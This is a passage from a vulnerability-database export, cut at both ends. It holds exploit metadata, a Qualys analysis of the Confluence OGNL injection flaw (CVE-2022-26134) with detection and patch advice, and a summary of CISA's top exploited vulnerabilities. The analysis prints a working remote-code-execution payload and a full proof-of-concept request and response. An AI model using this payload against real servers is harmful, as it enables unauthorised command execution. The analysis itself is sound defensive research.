"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T07:37:58", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T04:37:44", "description": "# PocList\r\n\r\n\u81ea\u5199\u7684\u6f0f\u6d1ePOC\u548cEXP\u5408\u96c6\u3002\r\n\r\nPOC\u811a\u672c\u6307\u5b9aurl\u6587\u4ef6\u540e\uff0c\u53ef\u591a\u7ebf\u7a0b\u6279\u91cf\u626b\u63cf\u76ee\u6807\u8fdb\u884c\u9a8c\u8bc1\uff1bEXP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-22T05:06:33", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zeroshell", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12725", "CVE-2021-26084", "CVE-2021-36749"], "modified": "2022-04-01T01:33:01", "id": "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "qualysblog": [{"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited it would allow the attacker to execute commands remotely with user privileges running the Confluence application. The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL Injection occurs when there is insufficient validation of user-supplied data, and the EL interpreter attempts to interpret it enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex in nature. The attack can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that prints the output of successfully executed remote commands.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking the above payload, variable `a` is assigned the value of an expression which calls various static methods using syntax `@class@method(args)`, where `java.lang.Runtime` class calls `exec` method which executes `id` command and the output is stored in the variable `a`.\n\nNext, from package `com.opensymphony.xwork2` class `ServletActionContext` is called which uses `getResponse` and `setHeader` method to fetch response of `id` system command in `X-Qualys-Response` custom header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered it can be seen `X-Qualys-Response` HTTP response header contains the output of the `id` system command resulting in successful exploitation of this remote code execution vulnerability.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at `/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. Following is the snippet from the log file printing stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\nAnalyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. The execution flows up to ` com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)` where [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls` [translateVariables](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>)` method from [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class ` com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)` which appears to be sink where the OGNL expression evaluation takes place invoking [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method from `OgnlValueStack` class `com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)` and goes forward parsing the OGNL expression with `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and multiple other classes.\n\n### Source Code Analysis\n\nTo have a better understanding of the execution flow of this RCE vulnerability, it&#x27;s important that we dive into the source code of these classes:\n\nStarting off with [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\nThe `getNamespaceFromServletPath` is used to obtain the namespace to which an Action belongs.\n\nFor example : When a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line ` servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` will consider everything before the last trailing slash as a namespace. Hence namespace `<RCE payload>` is created from the malicious requested URI.\n\nAs a result, the last trailing slash is an essential component for the exploit to work, if omitted the payload won\u2019t work.\n\nThis namespace is further utilized by `execute` method using `this.namespace` expression inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\nHere, `translateVariables` method from `TextParseUtil` class is called on `this.namespace` expression which converts all instances of `${...}` in expression to the value returned by a call to `OgnlValueStack.findValue`.\n\nGoing forward with [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) ? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n[`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method here takes two parameters `expression` which is basically a string which hasn\u2019t been translated and secondly a `value stack` which allows dynamic OGNL expressions to be evaluated against it.\n\nInside `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");` class `Pattern` defines a pattern to be searched and then it\u2019s created using `Pattern.compile()` method.\n\nIn Java `\\` single backslash is an escape character for strings. Hence `\\\\` double backslash are used in above regex `\\\\$\\\\{([^}]*)\\\\}` to escape $, {, } characters.\n\nNext line `final Matcher m = p.matcher(expression);` uses matcher() method to search for the pattern in a string, for example : `${qualys.rce.payload}` pattern is created. \n\nFurther contents of round brackets are extracts from the regular expression `\\\\$\\\\{([^}]*)\\\\}` to match the expression using `final String g = m.group(1);` and pass it to `final Object o = stack.findValue(g);`\n\nAnd finally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker makes a malicious request URI `http://127.0.0.1:8090/${rce_payload}/`, first `${rce_payload}` gets translated into a namespace and then using` TextParseUtil.translateVariables` the payload is extracted and henceforth using `findValue` the OGNL expression `rce_payload` gets evaluated causing Remote Code Execution.\n\n## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users shall see the following results in the vulnerability scan report:\n\n\n\n## Solution\n\nDue to the Critical severity and active exploitation of this vulnerability, organizations using the Confluence application are strongly advised to upgrade their Confluence application to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later version to remediate CVE-2022-26134 vulnerability. More information regarding patching and workaround can be referred to [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n## Credits\n\nConfluence Security Advisory**:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to** **[Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)**.**\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity &amp; Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity &amp; Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability&#x27;s disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via &quot;vulnerability chaining&quot;) enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect 